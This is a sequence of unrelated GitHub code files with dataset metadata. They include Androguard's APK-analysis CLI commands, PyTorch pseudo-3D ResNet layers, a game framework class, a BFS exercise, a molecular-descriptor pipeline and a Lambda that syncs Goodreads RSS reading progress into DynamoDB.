descriptor',\n)\n@click.option(\n '--accessflag',\n default='.*', show_default=True,\n help='Regex to filter by accessflags',\n)\n@click.option(\n '--no-isolated/--isolated',\n default=False,\n help='Do not store methods which has no xrefs',\n)\n@click.argument(\n 'APK',\n # help='The APK to analyze',\n nargs=1,\n required=False,\n type=click.Path(exists=True),\n)\ndef cg(output,\n show,\n verbose,\n classname,\n methodname,\n descriptor,\n accessflag,\n no_isolated,\n apk):\n \"\"\"\n Create a call graph and export it into a graph format.\n\n Example:\n\n \\b\n $ androguard cg APK\n \"\"\"\n androcg_main(verbose=verbose,\n APK=apk,\n classname=classname,\n methodname=methodname,\n descriptor=descriptor,\n accessflag=accessflag,\n no_isolated=no_isolated,\n show=show,\n output=output)\n\n\n@entry_point.command()\n@click.option(\n '--input', '-i', 'input_',\n type=click.Path(exists=True),\n help='APK to parse (legacy option)',\n)\n@click.argument(\n 'file_',\n type=click.Path(exists=True),\n # help='APK to parse',\n required=False,\n)\n@click.option(\n '--output', '-o',\n required=True,\n help='output directory. If the output folder already exsist, '\n 'it will be overwritten!',\n)\n@click.option(\n '--format', '-f', 'format_',\n help='Additionally write control flow graphs for each method, specify '\n 'the format for example png, jpg, raw (write dot file), ...',\n)\n@click.option(\n '--jar', '-j',\n is_flag=True,\n default=False,\n help='Use DEX2JAR to create a JAR file',\n)\n@click.option(\n '--limit', '-l',\n help='Limit to certain methods only by regex (default: \\'.*\\')',\n)\n@click.option(\n '--decompiler', '-d',\n help='Use a different decompiler (default: DAD)',\n)\ndef decompile(input_, file_, output, format_, jar, limit, decompiler):\n \"\"\"\n Decompile an APK and create Control Flow Graphs.\n\n Example:\n\n \\b\n $ androguard resources.arsc\n \"\"\"\n from androguard import session\n if file_ and input_:\n print(\"Can not give --input and positional argument! \"\n \"Please use only one of them!\", file=sys.stderr)\n sys.exit(1)\n\n if not input_ and not file_:\n print(\"Give one file to decode!\", file=sys.stderr)\n sys.exit(1)\n\n if input_:\n fname = input_\n else:\n fname = file_\n\n s = session.Session()\n with open(fname, \"rb\") as fd:\n s.add(fname, fd.read())\n export_apps_to_format(fname, s, output, limit,\n jar, decompiler, format_)\n\n\n@entry_point.command()\n@click.option(\n '--hash', 'hash_',\n type=click.Choice(['md5', 'sha1', 'sha256', 'sha512']),\n default='sha1', show_default=True,\n help='Fingerprint Hash algorithm',\n)\n@click.option(\n '--all', '-a', 'print_all_hashes',\n is_flag=True,\n default=False, show_default=True,\n help='Print all supported hashes',\n)\n@click.option(\n '--show', '-s',\n is_flag=True,\n default=False, show_default=True,\n help='Additionally of printing the fingerprints, show more '\n 'certificate information',\n)\n@click.argument(\n 'apk',\n # help='APK(s) to extract the Fingerprint of Certificates from',\n nargs=-1,\n required=False,\n type=click.Path(exists=True),\n)\ndef sign(hash_, print_all_hashes, show, apk):\n \"\"\"Return the fingerprint(s) of all certificates inside an APK.\"\"\"\n androsign_main(apk, hash_, print_all_hashes, show)\n\n@entry_point.command()\n@click.argument(\n 'apks',\n nargs=-1,\n required=False,\n type=click.Path(exists=True),\n)\ndef apkid(apks):\n \"\"\"Return the packageName/versionCode/versionName per APK as JSON.\"\"\"\n import json\n import logging\n logging.getLogger(\"androguard.axml\").setLevel(logging.ERROR)\n results = dict()\n for apk in apks:\n results[apk] = androguard.core.bytecodes.apk.get_apkid(apk)\n print(json.dumps(results, indent=2))\n\n\n@entry_point.command()\n@click.option(\n '--input_file', '-i',\n type=click.Path(exists=True),\n)\n@click.option(\n '--input_plugin', '-p',\n type=click.Path(exists=True),\n)\ndef gui(input_file, input_plugin):\n \"\"\"Androguard GUI\"\"\"\n androgui_main(input_file, input_plugin)\n\n\n@entry_point.command()\n@click.option(\n '--session',\n help='Previously saved session to load instead of a file',\n type=click.Path(exists=True),\n)\n@click.argument(\n 'apk',\n # help='Start the shell with the given APK. a, d, dx are available then. Loading might be slower in this case!',\n default=None,\n required=False,\n type=click.Path(exists=True),\n)\ndef analyze(session, apk):\n \"\"\"Open a IPython Shell and start reverse engineering.\"\"\"\n androlyze_main(session, apk)\n\n\n@entry_point.command()\n@click.option(\"-o\", \"--offset\",\n default=0,\n type=int,\n help=\"Offset to start dissassembly inside the file\")\n@click.option(\"-s\", \"--size\",\n default=0,\n type=int,\n help=\"Number of bytes from offset to disassemble, 0 for whole file\")\n@click.argument(\"DEX\")\ndef disassemble(offset, size, dex):\n \"\"\"\n Disassemble Dalvik Code with size SIZE starting from an offset\n \"\"\"\n androdis_main(offset, size, dex)\n\n\nif __name__ == '__main__':\n entry_point()\n","repo_name":"amimo/dcc","sub_path":"androguard/cli/entry_points.py","file_name":"entry_points.py","file_ext":"py","file_size_in_byte":13486,"program_lang":"python","lang":"en","doc_type":"code","stars":975,"dataset":"github-code","pt":"21"} +{"seq_id":"21914451236","text":"word_to_find = str(input())\nlines = int(input())\nprints = []\nwhile lines != 0:\n word = str(input())\n word_lst = []\n word_lst.append(word)\n make_char = []\n result = []\n for char in word_to_find:\n make_char.append(char)\n for char in word:\n result.append(char)\n\n if sorted(result) == sorted(make_char):\n prints.append('Yes')\n else:\n prints.append('No')\n\n lines -= 1\n\nprint(*prints, sep = '\\n')","repo_name":"TheFrostKing/Telerik","sub_path":"mock exam 2/word_anagrams.py","file_name":"word_anagrams.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39844291241","text":"from typing import Union, Tuple, Optional\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom einops import rearrange\n\n\nclass ConvPseudo3D(nn.Module):\n def __init__(self,\n in_channels: int,\n out_channels: int,\n kernel_size: Union[Tuple[int, int], int],\n stride: Union[Tuple[int, int], int] = 1,\n padding: Union[Tuple[int, int], int, str] = 'same',\n legacy_v010: bool = True\n ) -> None:\n super().__init__()\n self.spatial_conv = nn.Conv2d(\n in_channels = in_channels,\n out_channels = out_channels,\n kernel_size = kernel_size,\n stride = stride,\n padding = padding\n )\n self.temporal_conv = nn.Conv1d(\n in_channels = out_channels,\n out_channels = out_channels,\n kernel_size = 3 if legacy_v010 else kernel_size,\n padding = 1 if legacy_v010 else 'same'\n )\n # dirac impulse |= conv identity\n nn.init.dirac_(self.temporal_conv.weight.data)\n nn.init.zeros_(self.temporal_conv.bias.data)\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n is_video = x.ndim == 5\n if is_video:\n b, c, f, h, w = x.shape\n x = rearrange(x, 'b c f h w -> (b f) c h w')\n x = self.spatial_conv(x)\n if not is_video:\n return x\n else:\n bf, c, h, w = x.shape\n x = rearrange(x, '(b f) c h w -> (b h w) c f', b = b, f = f)\n x = self.temporal_conv(x)\n x = rearrange(x, '(b h w) c f -> b c f h w', h = h, w = w)\n return x\n\n\nclass UpsamplePseudo3D(nn.Module):\n def __init__(self,\n channels: int,\n out_channels: Optional[int] = None):\n super().__init__()\n self.channels = channels\n self.out_channels = out_channels or channels\n self.conv = ConvPseudo3D(\n in_channels = self.channels,\n out_channels = self.out_channels,\n kernel_size = 3,\n padding = 1\n )\n\n def forward(self, hidden_states, upsample_size = None):\n # TODO remove once bfloat interpolate on cuda is implemented in torch\n # https://github.com/pytorch/pytorch/issues/86679\n dtype = hidden_states.dtype\n if dtype == torch.bfloat16:\n hidden_states = hidden_states.to(torch.float32)\n is_video = hidden_states.ndim == 5\n if is_video:\n b, *_ = hidden_states.shape\n hidden_states = rearrange(hidden_states, 'b c f h w -> (b f) c h w')\n if hidden_states.shape[0] >= 64:\n hidden_states = hidden_states.contiguous()\n if upsample_size is None:\n hidden_states = F.interpolate(hidden_states, scale_factor = 2.0, mode = 'nearest')\n else:\n hidden_states = F.interpolate(hidden_states, size = upsample_size, mode = 'nearest')\n if dtype == torch.bfloat16:\n hidden_states = hidden_states.to(dtype)\n if is_video:\n hidden_states = rearrange(hidden_states, '(b f) c h w -> b c f h w', b = b)\n hidden_states = self.conv(hidden_states)\n return hidden_states\n\n\nclass DownsamplePseudo3D(nn.Module):\n def __init__(self,\n channels: int,\n out_channels: Optional[int] = None\n ) -> None:\n super().__init__()\n self.channels = channels\n self.out_channels = out_channels or channels\n self.conv = ConvPseudo3D(self.channels, self.out_channels, 3, stride = 2, padding = 1)\n\n def forward(self, hidden_states):\n hidden_states = self.conv(hidden_states)\n return hidden_states\n\n\nclass ResnetBlockPseudo3D(nn.Module):\n def __init__(self,\n *,\n in_channels: int,\n out_channels: Optional[int] = None,\n temb_channels: int = 512,\n dropout: float = 0.0\n ) -> None:\n super().__init__()\n self.in_channels = in_channels\n out_channels = in_channels if out_channels is None else out_channels\n self.out_channels = out_channels\n self.norm1 = torch.nn.GroupNorm(\n num_groups = 32,\n num_channels = in_channels,\n eps = 1e-5,\n affine = True\n )\n self.conv1 = ConvPseudo3D(\n in_channels,\n out_channels,\n kernel_size = 3,\n stride = 1,\n padding = 1\n )\n self.time_emb_proj = torch.nn.Linear(\n temb_channels,\n out_channels\n )\n self.norm2 = torch.nn.GroupNorm(\n num_groups = 32,\n num_channels = out_channels,\n eps = 1e-5,\n affine = True\n )\n self.dropout = torch.nn.Dropout(dropout)\n self.conv2 = ConvPseudo3D(\n out_channels,\n out_channels,\n kernel_size = 3,\n stride = 1,\n padding = 1\n )\n self.nonlinearity = nn.SiLU()\n self.conv_shortcut = ConvPseudo3D(\n in_channels,\n out_channels,\n kernel_size = 1,\n stride = 1,\n padding = 0\n ) if in_channels != out_channels else None\n\n def forward(self,\n input_tensor: torch.Tensor,\n temb: torch.Tensor\n ) -> torch.Tensor:\n hidden_states = input_tensor\n hidden_states = self.norm1(hidden_states)\n hidden_states = self.nonlinearity(hidden_states)\n hidden_states = self.conv1(hidden_states)\n temb = self.nonlinearity(temb)\n temb = self.time_emb_proj(temb)[:, :, None, None]\n is_video = hidden_states.ndim == 5\n if is_video:\n b, c, f, h, w = hidden_states.shape\n hidden_states = rearrange(\n hidden_states,\n 'b c f h w -> (b f) c h w'\n )\n hidden_states = hidden_states + temb.repeat_interleave(f, 0)\n hidden_states = rearrange(\n hidden_states,\n '(b f) c h w -> b c f h w',\n b = b\n )\n else:\n hidden_states = hidden_states + temb\n hidden_states = self.norm2(hidden_states)\n hidden_states = self.nonlinearity(hidden_states)\n hidden_states = self.dropout(hidden_states)\n hidden_states = self.conv2(hidden_states)\n if self.conv_shortcut is not None:\n input_tensor = self.conv_shortcut(input_tensor)\n output_tensor = input_tensor + hidden_states\n return output_tensor\n\n","repo_name":"lopho/makeavid-sd-tpu","sub_path":"makeavid_sd/torch_impl/torch_resnet_pseudo3d.py","file_name":"torch_resnet_pseudo3d.py","file_ext":"py","file_size_in_byte":6730,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"21"} +{"seq_id":"32452557","text":"from backend.game.playbox.exceptions.game_over_exception import GameOver\nfrom backend.game.status import Status\n\nclass Game(object):\n def __init__(self, debug_logger, screen, players, environment_manager, turns=99999999, required_players=2, accept_timeouts=False):\n self.screen = screen\n self.debug_logger = debug_logger\n self.turns = turns\n self.required_players = required_players\n self.players = {}\n self.accept_timeouts = accept_timeouts\n self.win_pos = 1\n self.lose_pos = len(players)\n self.environment_manager = environment_manager\n for player in players:\n self.players[player.name] = player\n\n def exit_player(self, player_name):\n self.environment_manager.interact(self.players[player_name].id, '$exit')\n\n def interact(self, player_name):\n message = self.players[player_name].get_data()\n return self.environment_manager.interact(self.players[player_name].id, message)\n\n def queue_command(self, player_name, data):\n self.players[player_name].store_data(data)\n\n def players_win(self, names):\n for name in names:\n self.players[name].position = self.win_pos\n self.players[name].status = Status.WINNER\n self.win_pos += len(names)\n\n def players_lose(self, names):\n for name in names:\n self.players[name].position = self.lose_pos\n self.players[name].status = Status.LOSER\n self.lose_pos -= len(names)\n\n def players_dsq(self, dsq):\n for d in dsq:\n self.players[d[0]].position = len(self.players)\n self.players[d[0]].status = d[1]\n self.lose_pos -= len(dsq)\n for name in self.players:\n if self.players[name].status == Status.LOSER:\n self.players[name].position -= len(dsq)\n\n def start(self):\n pass\n\n def turn(self):\n raise NotImplementedError\n\n def end(self):\n self.screen.close()\n\n def early_game_over(self):\n pass\n\n def check(self):\n players_left = 0\n for player_name in self.players:\n if self.players[player_name].status != Status.PLAYS:\n if self.players[player_name].status == Status.WINNER or \\\n self.players[player_name].status == Status.LOSER or \\\n self.players[player_name].status == Status.DRAW:\n self.exit_player(player_name)\n else:\n self.exit_player(player_name)\n else:\n players_left += 1\n\n if players_left < self.required_players:\n for player_name in self.players:\n if self.players[player_name].status == Status.PLAYS:\n self.players_win([player_name])\n self.exit_player(player_name)\n raise GameOver\n\n def play(self):\n self.start()\n try:\n for turn_no in xrange(self.turns):\n self.turn()\n self.check()\n except GameOver:\n self.early_game_over()\n self.end()\n","repo_name":"tudorvaran/ChallengeBot","sub_path":"backend/game/abstract_game.py","file_name":"abstract_game.py","file_ext":"py","file_size_in_byte":3103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27539582864","text":"def category_display_attributes(thing=None, **kwargs):\n attributes = {\n 'display_context': {\n 'add_tasks': True,\n 'description': True,\n 'prefix': 'Category: ',\n 'url': True,\n 'bread_crumbs': True,\n 'children_attributes': {\n 'choice': {\n 'notation': True,\n },\n },\n },\n }\n if thing:\n attributes['display_context']['extra_action_parameters'] = {\n 'thing': thing,\n }\n return attributes\n\n\ncategories_display_attributes = {\n 'display_context': {\n 'add_tasks': True,\n 'description': True,\n 'prefix': 'Categories: ',\n 'url': True,\n 'bread_crumbs': True,\n 'children_attributes': {\n 'category': {\n 'notation': True,\n },\n },\n }\n}\n\nchoice_display_attributes = {\n 'display_context': {\n 'add_tasks': True,\n 'description': True,\n 'prefix': 'Choice: ',\n 'url': True,\n 'bread_crumbs': True,\n }\n}\n\n\ndef destination_display_attributes(destination_prefix=None, **kwargs):\n return {\n 'display_context': {\n 'add_tasks': True,\n 'description': True,\n 'destination_quantity': True,\n 'prefix': destination_prefix,\n 'url': True,\n 'bread_crumbs': True,\n 'children_attributes': {\n 'destination': {\n 'notation': True,\n 'destination_quantity': True,\n },\n },\n }\n }\n\n\ndef place_display_attributes(place_prefix=None, **kwargs):\n return {\n 'display_context': {\n 'source_quantity': True,\n 'add_tasks': True,\n 'description': True,\n 'prefix': place_prefix,\n 'url': True,\n 'bread_crumbs': True,\n 'children_attributes': {\n 'place': {\n 'notation': True,\n 'source_quantity' : True,\n },\n },\n }\n }\n\n\nthing_display_attributes = {\n 'display_context': {\n 'add_tasks': True,\n 'description': True,\n 'source_quantity': True,\n 'url': True,\n 'bread_crumbs': True,\n 'children_attributes': {\n 'thing': {\n 'notation': True,\n 'thing_quantity': True,\n },\n },\n },\n}\n\ninventory_display_attributes = {\n 'display_context': {\n 'children_attributes': {\n 'inventory': {\n 'notation': True,\n },\n },\n },\n}\n\nperson_display_attributes = {\n 'display_context': {\n 'children_attributes': {\n 'inventory': {\n 'notation': True,\n },\n },\n },\n}\n\nspecification_display_attributes = {\n 'display_context': {\n 'source_quantity': True,\n 'children_attributes': {\n 'inventory': {\n 'notation': True,\n },\n 'category_specification': {\n 'url': True,\n 'notation': True,\n },\n },\n },\n}\n\n\ndef dual_view_childrens_attributes(**kwargs):\n return {\n 'categories': categories_display_attributes,\n 'category': category_display_attributes(**kwargs),\n 'choice': choice_display_attributes,\n 'destination': destination_display_attributes(**kwargs),\n 'inventory': inventory_display_attributes,\n 'place': place_display_attributes(**kwargs),\n 'specification': specification_display_attributes,\n 'thing': thing_display_attributes,\n 'person': person_display_attributes,\n 'people': person_display_attributes,\n }\n","repo_name":"wahinipa/cupboard","sub_path":"www/tracking/contexts/card_display_attributes.py","file_name":"card_display_attributes.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"hi","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42632078123","text":"\nfrom collections import deque\n\n\n# 6-2\n\ngraph = dict()\ngraph['CAB'] = ['CAT', 'CAR']\ngraph['CAT'] = ['MAT', 'BAT']\ngraph['CAR'] = ['CAT', 'BAR']\ngraph['MAT'] = ['BAT']\ngraph['BAR'] = ['BAT']\ngraph['BAT'] = []\n\n\n# (1) 최단경로까지 도달하지만 해당 경로는 출력하지 않음.\n\n# def search(name):\n# q = deque()\n# q += graph[name]\n# searched = []\n# while q:\n# # print(searched)\n# # print(q)\n# node = q.popleft()\n# # print(node)\n# if node not in searched:\n# if node == 'BAT':\n# print('도착 최단 경로 : ')\n# print(node)\n# print()\n# return True\n# else:\n# # q += graph[node]\n# for n in graph[node]:\n# if n not in q and n not in searched:\n# q.append(n)\n# searched.append(node)\n#\n# print('BAT까지 가는 길이 존재하지 않습니다.')\n# return False\n#\n#\n# search('CAB')\n\n\n# (2) 최단 경로를 출력\n\ndef search2(name):\n q = deque()\n for i in graph[name]:\n q.append([i] + [name])\n searched = []\n while q:\n # print(searched)\n print(q)\n node_list = q.popleft()\n print(node_list)\n node = node_list[0]\n # print(node)\n if node not in searched:\n if node == 'BAT':\n print('도착 최단 경로')\n print(f'경로 :', end=' ')\n [print(f'{i}', end=' ') for i in node_list]\n return True\n else:\n # q += graph[node]\n for n in graph[node]:\n if n not in q and n not in searched:\n node_list2 = [n] + node_list\n q.append(node_list2)\n searched.append(node)\n\n print('BAT까지 가는 길이 존재하지 않습니다.')\n return False\n\n\nsearch2('CAB')\n\n# 6-3\n# 올바른 것 : B\n# 올바르지 않은 것 : A, C\n\n# 6-4\n# 1. 기상\n# 2. 운동\n# 3. 샤워\n# 4. 옷 입기\n# 5. 양치질\n# 6. 아침 식사\n# 7. 점심 도시락 싸기\n\n# 6-5\n# A - O\n# B - X (가장 우측 위로가는 선 때문)\n# C - O\n\n\n# 181126 Result after 1 hour of coding\n\ndef breadth_first_algorithm(name):\n\n q = deque()\n\n # q += graph[name]\n ########################\n path = {}\n for i in graph[name]:\n path[i] = [name, i]\n q.append(i)\n ########################\n\n searched_list = []\n\n while q:\n person = q.popleft()\n\n if person == 'BAT':\n print(path[person])\n return f'\"{person}\" is mango seller!'\n searched_list.append(person)\n\n print(person)\n print(graph[person])\n print(q)\n\n for i in graph[person]:\n if i not in q and i not in searched_list:\n q.append(i)\n print(i)\n ############################\n path[i] = path[person] + [i]\n ############################\n print()\n\n print('There is no mango seller!')\n\n\nprint(breadth_first_algorithm('CAB'))\n","repo_name":"smallbee3/algorithm-study","sub_path":"hellocoding/6_practice.py","file_name":"6_practice.py","file_ext":"py","file_size_in_byte":3136,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"37535095536","text":"# coding=utf-8\nimport os\nimport utils\nfrom utils import pro_path\nfrom file_target_helper import *\n\nDEBUG = True\n\n\n# 保留idx对应位置的特征(注意:前两列为smiles、rt, 需要从第3列开始)\ndef handle_by_idx(data, idx):\n new_data = [data[:, 0], data[:, 1]]\n data = data[:, 2:].T\n for i in idx:\n new_data.append(data[i])\n return np.array(new_data).T\n\n\nif __name__ == \"__main__\":\n\n # 1. 读取 pro_path + \"data/input_data/target/\" 文件夹下的所有文件\n file_list = os.listdir(pro_path + \"data/input_data/target/\")\n if DEBUG:\n print(file_list)\n\n # 2. 读取 idx 文件\n idx_graph = utils.read_csv(pro_path + \"data/gen_data/idx_graph.csv\", header=None)[0]\n idx_mordred = utils.read_csv(pro_path + \"data/gen_data/idx_mordred.csv\", header=None)[0]\n\n # 3. 遍历所有文件,并一次处理每个文件\n for file in file_list:\n if len(file.split('.')) == 1: # 说明是文件夹\n continue\n # 前置处理:生成该文件对应的文件夹\n output_path = pro_path + \"data/gen_data/target/\" + file.split('.')[0] + \"/\"\n if not os.path.exists(output_path):\n os.makedirs(output_path)\n print('-' * 20, \"开始处理\", file, '-' * 20)\n print(\"结果保存路径为: \", output_path)\n\n # 4. 获取文件内容\n print(pro_path + \"data/input_data/target/\" + file)\n smiles, rts = utils.read_txt_smiles_rts(pro_path + \"data/input_data/target/\" + file)\n new_smiles, new_rts = [], []\n # 5. 根据 smiles 计算分子 mol\n mols = []\n for i in range(len(smiles)):\n e = smiles[i]\n try:\n mol = Chem.MolFromSmiles(e)\n mol_gnn = Chem.AddHs(Chem.MolFromSmiles(e))\n\n mols.append(mol)\n new_smiles.append(smiles[i])\n new_rts.append(rts[i])\n except:\n if DEBUG:\n print(e, \"无法计算出 mol 或者 mol_gnn\")\n pass\n # 6. 计算 图向量, 并根据 idx_graph 的下标,只保留 idx_graph 中对应的特征\n if DEBUG: print(\"开始计算图向量...\")\n graph_vec = cal_gnn_vec(pro_path, new_smiles, new_rts) # 返回numpy数据,前两列是smiles, rt\n graph_vec = handle_by_idx(graph_vec, idx_graph)\n utils.write_csv(output_path, file.split('.')[0] + \"_graph.csv\", graph_vec)\n if DEBUG:\n print(graph_vec.shape)\n print(\"图向量计算完成...\")\n # 7. 计算 MACCS\n if DEBUG: print(\"开始计��MACCS...\")\n maccs = cal_MACCS(new_smiles, new_rts, mols) # 返回numpy数据,前两列是smiles, rt\n utils.write_csv(output_path, file.split('.')[0] + \"_maccs.csv\", maccs)\n if DEBUG:\n print(maccs.shape)\n print(\"MACCS计算完成...\")\n # 8. 计算 mordred\n if DEBUG: print(\"开始计算mordred...\")\n mordred = cal_mordred(new_smiles, new_rts, mols) # 返回numpy数据,前两列是smiles, rt\n mordred = handle_by_idx(mordred, idx_mordred)\n if DEBUG: print(\"开始填充缺失值...\")\n mordred = fill_mordred(mordred, mols)\n if DEBUG: print(\"缺失值填充完成\")\n utils.write_csv(output_path, file.split('.')[0] + \"_mordred.csv\", mordred)\n if DEBUG:\n print(mordred.shape)\n print(\"mordred计算完成...\")\n # 9. 对 图向量、mordred 中的每个特征进行标准化\n if DEBUG: print(\"开始标准化...\")\n graph_std = standred(graph_vec)\n utils.write_csv(output_path, file.split('.')[0] + \"_graph_std.csv\", graph_std)\n mordred_std = standred(mordred)\n utils.write_csv(output_path, file.split('.')[0] + \"_mordred_std.csv\", mordred_std)\n if DEBUG: print(\"标准化完成....\")\n pass\n","repo_name":"ToLoveToFeel/TL-MDC","sub_path":"code/file_process/file_target_processing.py","file_name":"file_target_processing.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38223149116","text":"import boto3\nimport dynamodb_json as ddbjson\nimport feedparser\nimport json\nimport re\nimport urllib3\nimport uuid\nimport yaml\n\nfrom copy import deepcopy\nfrom datetime import datetime, timedelta\nfrom dateutil import tz\n\n# =====================================================================\n# Convert a timestamp string as it appears in the Goodreads RSS feed\n# to a string of the form YYYYMMDD-HHMMSS\n# =====================================================================\ndef ts_to_dtstr(ts):\n dt = datetime.strptime(ts, \"%a, %d %b %Y %H:%M:%S %z\")\n dt_utc = dt.astimezone(tz.gettz('UTC'))\n dt_utc_str = dt_utc.strftime(\"%Y%m%d-%H%M%S\")\n return dt_utc_str\n\n# =====================================================================\n# FIND THE DICT WITH GIVEN k==v FROM A LIST, IF IT EXISTS.\n# RETURN None OTHERWISE.\n# =====================================================================\ndef find_item_in(test_list, k, v):\n return next((item for item in test_list if item[k] == v), None)\n\n# =====================================================================\n# VALIDATE THE CONTENTS OF A DICT.\n# req_attrs AND opt_attrs MUST BE DEFINED\n# =====================================================================\ndef validate_input_item(input_item):\n all_attrs = req_attrs + opt_attrs\n is_valid = True\n # check required attribtues\n for ra in req_attrs:\n if ra not in input_item.keys():\n print(f\"Required attribute ({ra}) not found in input item\")\n is_valid = False\n # check all attributes\n for k in input_item.keys():\n if k not in all_attrs:\n print(f\"Invalid attribute ({k}) found in input item\")\n is_valid = False\n # Check rating attribute (only if not blank)\n #if ('rating' in input_item.keys()) and (input_item['rating'] != \"\"):\n # try:\n # rt = int(input_item['rating'])\n # if rt not in range(1,6):\n # raise ValueError\n # except ValueError:\n # is_valid = False\n return is_valid\n\n# =====================================================================\n# GET THE VALUE FOR A GIVEN ATTRIBUTE IN A DICT, IF IT EXISTS\n# RETURN None OTHERWISE\n# =====================================================================\ndef get_value(test_item, k):\n return test_item[k] if k in test_item.keys() else None\n\n# =====================================================================\n# RETURN THE VALUE FROM A DICT IN A GIVEN LIST IF THE NAME MATCHES\n# =====================================================================\ndef get_value_from(test_list, name):\n return next((item['Value'] for item in test_list if item['Name'] == name), None)\n\n# =====================================================================\n# Remove non-alphabetic characters from attribute names\n# =====================================================================\ndef conv_attr_str(instr):\n regex = re.compile('[^a-zA-Z]')\n #First parameter is the replacement, second parameter is your input string\n return regex.sub('', instr)\n\n# =====================================================================\n# LAMBDA HANDLER FUNCTION\n# =====================================================================\ndef lambda_handler(event, context):\n\n #--\n #-- GET PARAMETERS FROM PARAMETER STORE\n #--\n ssm_client = boto3.client('ssm')\n parameters = [\n 'OMG_API_KEY',\n 'TRAKT_HISTORY_INTERVAL'\n ]\n resp_ssm = ssm_client.get_parameters(Names=parameters)\n omg_api_key = get_value_from(resp_ssm['Parameters'], 'OMG_API_KEY')\n display_days = int(get_value_from(resp_ssm['Parameters'], 'TRAKT_HISTORY_INTERVAL'))\n\n #--\n #-- CONFIGURATION\n #--\n \n # GENERAL CONFIGURATION\n content_version = '7'\n type_names = {\n \"B\": \"Books\",\n \"L\": \"Listening\",\n \"R\": \"Other Reading\",\n \"W\": \"Watching\",\n \"T\": \"Tinkering\"\n }\n global req_attrs\n req_attrs = ['title', 'type']\n global opt_attrs \n opt_attrs = ['id', 'icon', 'url', 'progress', 'last-episode', 'delete', 'rating', 'note', 'trakt_id']\n \n # DYNAMO DB CONFIG\n table_name = f\"now-content-v{content_version}\"\n \n # RSS FEED URL\n rss_url = \"https://www.goodreads.com/user/updates_rss/6976996\"\n\n oneweekago = datetime.now() - timedelta(days=display_days)\n owa_str = oneweekago.strftime('%Y%m%d-000000')\n\n #--\n #-- LOAD ITEMS FROM GOODREADS RSS FEED AND ADD TO THE INPUT ITEMS\n #--\n feed = feedparser.parse(rss_url)\n book_list = {}\n for entry in feed['entries'][::-1]:\n summary = entry['summary']\n book_progress = None\n \n # Skip old entries\n published = ts_to_dtstr(entry['published'])\n if published <= owa_str:\n continue\n \n # Extract book URL\n m1 = re.search('href=\"([^\"]*)\"', summary)\n if m1:\n book_url = m1.group(1)\n else:\n # Skip if no URL\n continue\n\n # Extract book title\n m2 = re.search('title=\"([^\"]*)\"', summary)\n if m2:\n book_title = m2.group(1)\n else:\n # Skip if no title\n continue\n \n # Started reading; don't overwrite book_progress is not present\n m2b = re.search('started reading', summary)\n if m2b:\n book_progress = 0\n \n # Extract book progress\n m3 = re.search('is (\\d+)% done', summary)\n if m3:\n book_progress = int(m3.group(1))\n \n m3b = re.search('is on page (\\d+) of (\\d+)', summary)\n if m3b:\n book_progress = int( round( ( int(m3b.group(1)) / int(m3b.group(2)) ) * 100, 0) )\n\n # Book finished?\n m4 = re.search('finished reading', summary)\n if m4:\n book_progress = 100\n \n # Extract book rating\n m5 = re.search('gave (\\d) star', summary) # scale of 5\n book_rating = int(m5.group(1)) if m5 else None\n \n # populate a dict in case the same title appears more than once\n if isinstance(book_progress,int) or book_rating:\n ts = datetime.now().strftime('%Y%m%d-%H%M%S')\n if book_url not in book_list.keys():\n book_list[book_url] = {} # create empty dict\n \n # book exists, overwrite with current values\n book_list[book_url]['id'] = book_url\n book_list[book_url]['title'] = book_title\n book_list[book_url]['type'] = 'B'\n book_list[book_url]['url'] = book_url\n book_list[book_url]['icon'] = 'book'\n if isinstance(book_progress, int):\n book_list[book_url]['progress'] = str(book_progress)\n if book_rating:\n book_list[book_url]['rating'] = str(book_rating)\n\n # BUILD input_items from book_list\n input_items = [v for v in book_list.values()]\n\n # GET DYNAMODB CLIENT\n ddb_client = boto3.client('dynamodb')\n ddb_resource = boto3.resource('dynamodb')\n ddb_table = ddb_resource.Table(table_name)\n\n #--\n #-- GET \"RECENT\" ITEMS FROM DYNAMODB\n #--\n resp = ddb_table.scan(\n TableName=table_name,\n Select='ALL_ATTRIBUTES',\n ExpressionAttributeNames={\"#modified\": \"modified\"},\n ExpressionAttributeValues={':ONEWEEKAGO': owa_str},\n FilterExpression=\"#modified >= :ONEWEEKAGO\"\n )\n recent_items_d = resp['Items']\n recent_items = ddbjson.loads(recent_items_d)\n print(\">>> Loaded {} recent items from DynamoDB\".format(len(recent_items)))\n \n #--\n #-- COMPARE INPUT ITEMS TO RECENT ITEMS\n #--\n updated_items = [] # LIST OF UPDATED ITEMS, INCL. MODIFIED ATTRS ONLY\n new_items = [] # LIST OF COMPLETE ITEMS\n for input_item in input_items:\n\n # Get the item's ID, if it exists\n item_id = get_value(input_item, 'id')\n\n # Look for the item ID in the list of recent items (from DynamoDB)\n recent_item = find_item_in(recent_items, 'id', item_id)\n if recent_item is None:\n # This is a new book. Add timestamps and append to new_items\n input_item['modified'] = ts\n input_item['created'] = ts\n new_items.append(deepcopy(input_item))\n else:\n # This is a recent item.\n # Check for differences between input_item and recent_item.\n # We're only looking at the input_item's keys here.\n upd = False\n updated_item = {}\n updated_item['id'] = item_id\n\n # Check for attributes in input_item (RSS) that are not in recent_item (DynamoDB)\n # If there are differences, input_item will take precedence\n for k in input_item.keys():\n if k in ['modified', 'created']:\n # Ignore timestamps\n continue\n if (k not in recent_item) or (recent_item[k] != input_item[k]):\n print(f\"*** Adding or updating attribute ({k}) for id={item_id}\")\n upd = True\n updated_item[k] = str(input_item[k])\n\n if upd:\n updated_item['modified'] = datetime.now().strftime('%Y%m%d-%H%M%S')\n updated_items.append(deepcopy(updated_item))\n\n #--\n #-- INSERT NEW ITEMS IN DYNAMODB\n #--\n if len(new_items) > 0:\n for new_item in new_items:\n print(f\"*** Adding new item: 